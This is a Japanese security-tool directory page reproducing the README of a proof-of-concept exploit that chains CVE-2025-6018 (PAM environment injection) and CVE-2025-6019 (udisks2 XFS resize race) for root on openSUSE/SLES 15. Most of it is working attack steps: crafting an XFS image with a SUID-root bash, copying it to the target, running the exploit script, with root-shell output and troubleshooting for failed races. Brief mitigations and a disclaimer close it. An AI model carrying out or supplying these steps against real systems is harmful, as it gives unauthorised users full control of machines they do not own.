Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-6018-6019 — CVE-2025-6018 CVE-2025-6019 PoC Exploit - openSUSE/SUSE Linux Enterprise 15 におけるローカル権限昇格 - PAMバイパス + udisks2 XFS競合状態のLPEによるroot権限取得 | Kitploit
ツール/GitHubGitHub/desertdemons/cve-2025-6018-6019
特権昇格脆弱性分析エクスプロイトペネトレーションテスト論文と研究学習と教育バイナリエクスプロイト
GitHubdesertdemons/cve-2025-6018-6019

CVE-2025-6018-6019

CVE-2025-6018 CVE-2025-6019 PoC Exploit - openSUSE/SUSE Linux Enterprise 15 におけるローカル権限昇格 - PAMバイパス + udisks2 XFS競合状態のLPEによるroot権限取得

リポジトリを見る
414ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-6018 CVE-2025-6019 PoC エクスプロイト

ローカル特権昇格 (LPE) - openSUSE / SUSE Linux Enterprise 15

CVE-2025-6018 CVE-2025-6019 PoC Exploit License

CVE-2025-6018 および CVE-2025-6019 に対する動作するPoC/エクスプロイト - openSUSE Leap 15.x および SUSE Linux Enterprise 15.x 上で、非特権ユーザーから root への特権昇格

🎯 クイックサマリー

CVE ID脆弱性影響
CVE-2025-6018PAM環境変数インジェクションallow_active polkit ステータスへのバイパス
CVE-2025-6019udisks2/libblockdev XFS リサイズの競合状態Root シェル

攻撃チェーン

root@kitploit:~
非特権SSHユーザー → [CVE-2025-6018] → allow_active → [CVE-2025-6019] → ROOT

🔥 Proof of Concept デモ

root@kitploit:~
# Check vulnerability
./exploit.sh --check

# Setup PAM bypass (CVE-2025-6018)
./exploit.sh --setup

# Reconnect SSH, then: su - $USER

# Exploit (CVE-2025-6019)
./exploit.sh --exploit /tmp/xfs.img

# Result: ROOT SHELL
uid=1000(user) gid=1000(user) euid=0(root)

📥 インストール

root@kitploit:~
git clone https://github.com/DesertDemons/CVE-2025-6018-6019.git
cd CVE-2025-6018-6019
chmod +x *.sh

🎯 影響を受けるシステム

  • ✅ openSUSE Leap 15.0, 15.1, 15.2, 15.3, 15.4, 15.5, 15.6
  • ✅ SUSE Linux Enterprise Server (SLES) 15 SP1-SP6
  • ✅ SUSE Linux Enterprise Desktop (SLED) 15 SP1-SP6

⚠️ 注: openSUSE Leap 15.6 は 2026年4月30日 にサポート終了 (EOL) を迎えます。この日以降、セキュリティパッチはリリースされません。ユーザーは Leap 16.0 または拡張サポート付きの SLES に移行してください。

脆弱なコンポーネント

  • PAM (Linux-PAM 1.3.0 - 1.6.0) で user_readenv=1
  • udisks2 2.9.x (libblockdev 使用)
  • polkit で udisks2 アクションに対して allow_active: yes

📖 使用方法

オプション1: 脆弱性の確認

root@kitploit:~
./exploit.sh --check

オプション2: PAMバイパスのセットアップ (CVE-2025-6018)

root@kitploit:~
./exploit.sh --setup
# Then: exit SSH, reconnect, run: su - $USER

オプション3: エクスプロイト (CVE-2025-6019)

root@kitploit:~
./exploit.sh --exploit /tmp/xfs.img

オプション4: 完全自動モード

root@kitploit:~
./exploit.sh --auto /tmp/xfs.img

オプション5: イメージ作成手順の表示

root@kitploit:~
./exploit.sh --create-image

🛠️ XFSペイロードイメージの作成

攻撃側マシンで root として実行:

⚠️ 注意: 被害者の /usr/bin/bash バイナリを必ず使用してください。ローカルのものは使用しないでください。異なるディストリビューション (Kali, Arch, Ubuntu など) の bash バイナリは、glibc/共有ライブラリのABIの不一致によりターゲット上で失敗します。たとえ同じ x86_64 アーキテクチャでも同様です。

ヘルパースクリプトの使用 (推奨)

スクリプトは xfsprogs のバージョンを自動検出し、正しいフラグを適用します:

root@kitploit:~
# Get victim's bash first
scp user@target:/usr/bin/bash /tmp/victim_bash

# Create image (auto-detects safe mkfs flags)
sudo ./create_image.sh /tmp/victim_bash xfs.img

# For SUSE 15 SP1-SP4 targets (kernel < 5.14), use compatibility mode:
sudo ./create_image.sh --compat /tmp/victim_bash xfs.img

手動作成

root@kitploit:~
sudo su -

# 1. Get victim's bash binary
scp user@target:/usr/bin/bash /tmp/bash

# 2. Create 300MB XFS image with safe flags
dd if=/dev/zero of=xfs.img bs=1M count=300
mkfs.xfs -f -i exchange=0 -n parent=0 xfs.img

# 3. Mount with SUID support
mkdir -p /tmp/mnt
mount -o loop,suid xfs.img /tmp/mnt

# 4. Copy victim's bash and set SUID bit
cp /tmp/bash /tmp/mnt/xpl
chmod 4755 /tmp/mnt/xpl
chown root:root /tmp/mnt/xpl
ls -la /tmp/mnt/xpl  # MUST show: -rwsr-xr-x

# 5. Unmount and transfer
umount /tmp/mnt
scp xfs.img user@target:/tmp/

XFSフォーマットの互換性

XFSイメージは、ターゲットのカーネルと互換性のあるフラグでフォーマットする必要があります。新しいバージョンの xfsprogs は、デフォルトでオンになっているオン�isk機能を有効にし、古いSUSEカーネルが読み取れないため、udisks2のリサイズマウント中に wrong fs type, bad superblock エラーが発生します。

ターゲットカーネルmkfs.xfs コマンド
SUSE 15 SP5-SP65.14 / 6.4mkfs.xfs -f -i exchange=0 -n parent=0 xfs.img
SUSE 15 SP1-SP44.12 - 5.3mkfs.xfs -f -m crc=0,reflink=0 xfs.img

理由: exchange および parent はカーネル6.10以降の機能で(xfsprogs 6.xではデフォルトでオン)、bigtime、inobtcount、nrext64 はカーネル5.10以降の機能です。SP1-SP4の「compat」コマンド(-m crc=0,reflink=0)は、すべての最新機能を無効にしたV4 XFSフォーマットを作成し、すべてのSUSE 15 SPで動作します。

🔬 技術的詳細

CVE-2025-6018: PAM環境変数インジェクション

脆弱性: PAMの pam_env モジュールは user_readenv=1(SUSEではデフォルト)で ~/.pam_environment を読み取り、環境変数のインジェクションを許可します。

エクスプロイト: XDG_SEAT=seat0 および XDG_VTNR=1 を設定して systemd-logind を騙し、allow_active polkit 特権を付与させます。

root@kitploit:~
# ~/.pam_environment
XDG_SEAT=seat0
XDG_VTNR=1

CVE-2025-6019: XFSリサイズの競合状態

脆弱性: udisks2 を介して XFS ファイルシステムをリサイズする際、libblockdev はファイルシステムを nosuid フラグなしで 一時的にマウントします。

エクスプロイト:

  1. SUID root バイナリを含む XFS イメージを作成
  2. ループデバイスをセットアップ
  3. D-Bus 経由でリサイズをトリガー
  4. 一時的なマウント中に SUID バイナリを実行する競合を起こす
  5. Root シェルを取得

📋 完全なエクスプロイトの手順

ステップ1: 脆弱性の確認

root@kitploit:~
./exploit.sh --check

出力:

root@kitploit:~
[+] pam_env.so found in PAM configuration
[+] pam_systemd.so found - escalation vector available
[+] Target OS is vulnerable (openSUSE/SLES)
[-] allow_active status: NO

ステップ2: PAMバイパスのセットアップ

root@kitploit:~
./exploit.sh --setup
exit
ssh user@target
su - $USER

ステップ3: allow_active の確認

root@kitploit:~
./exploit.sh --check

出力:

root@kitploit:~
[+] allow_active status: YES
    You have allow_active privileges!

ステップ4: XFSイメージの転送

root@kitploit:~
# On attacker:
scp xfs.img user@target:/tmp/

ステップ5: エクスプロイト

root@kitploit:~
./exploit.sh --exploit /tmp/xfs.img

出力:

root@kitploit:~
[+] Loop device created: /dev/loop0
[+] Loop device verified as XFS
[*] Starting race condition loop...
[*] Triggering XFS resize on loop0...

=== ROOT SHELL OBTAINED ===
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user)

root@target#

🔧 トラブルシューティング

🛡️ 緩和策

即時修正

root@kitploit:~
# Disable user_readenv in PAM
sed -i 's/user_readenv=1/user_readenv=0/g' /etc/pam.d/common-auth

# Or restrict udisks2 polkit policy
# Change allow_active from "yes" to "auth_admin"

ベンダーパッチ

  • PAM、udisks2、libblockdev パッケージを更新
  • SUSE セキュリティアドバイザリを確認

📚 参考文献

  • Qualys セキュリティアドバイザリ
  • Qualys 技術文書
  • SUSE CVE-2025-6018
  • SUSE CVE-2025-6019
  • NVD CVE-2025-6018
  • NVD CVE-2025-6019

🏆 クレジット

  • Qualys Threat Research Unit - 脆弱性の発見
  • DesertDemons - PoCエクスプロイトの開発
  • Jazzruran - xfsprogsバージョンの不一致のバグ報告と修正 (#1)

⚠️ 免責事項

このツールは許可されたセキュリティテストおよび教育目的のみに使用してください。コンピュータシステムへの不正アクセスは違法です。著者は誤用に対して一切の責任を負いません。

📄 ライセンス

MIT License


🔍 キーワード

CVE-2025-6018 CVE-2025-6019 PoC 概念実証 エクスプロイト 特権昇格 LPE ローカル特権昇格 Root openSUSE SUSE SLES PAM pam_env udisks2 libblockdev


⭐ このリポジトリが役に立ったらスターをお願いします! ⭐

ツールをダウンロード
問題原因解決策
allow_active: NOPAMバイパスが有効でない--setup を実行し、SSHを終了して再接続し、su - $USER を実行
Image is not XFSファイルシステムのフォーマットが間違っているmkfs.xfs を使用(mkfs.ext4 ではない)
SUID not workingパーミッションが設定されていない攻撃側マシンで -rwsr-xr-x パーミッションを確認
Race condition missedタイミングの問題エクスプロイトを再実行(通常1~3回で成功)
SUIDバイナリがセグメンテーションフォールトまたは GLIBC_x.xx not found エラー異なるディストリビューションの bash バイナリ(glibc/ABIの不一致)ローカルの bash ではなく、scp で被害者の /usr/bin/bash バイナリを使用
Resize output: Error resizing filesystem on /dev/loopN: Failed to mount '/dev/loopN' before resizing it: wrong fs type, bad option, bad superblock on /dev/loopN, missing codepage or helper program, or other errorXFSイメージがターゲットカーネルで読み取れない機能でフォーマットされている(xfsprogsバージョンの不一致)SP5/SP6の場合は mkfs.xfs -f -i exchange=0 -n parent=0 xfs.img、SP1-SP4の場合は mkfs.xfs -f -m crc=0,reflink=0 xfs.img でイメージを作成
XFS
競合状態
セキュリティ
脆弱性
ペネトレーションテスト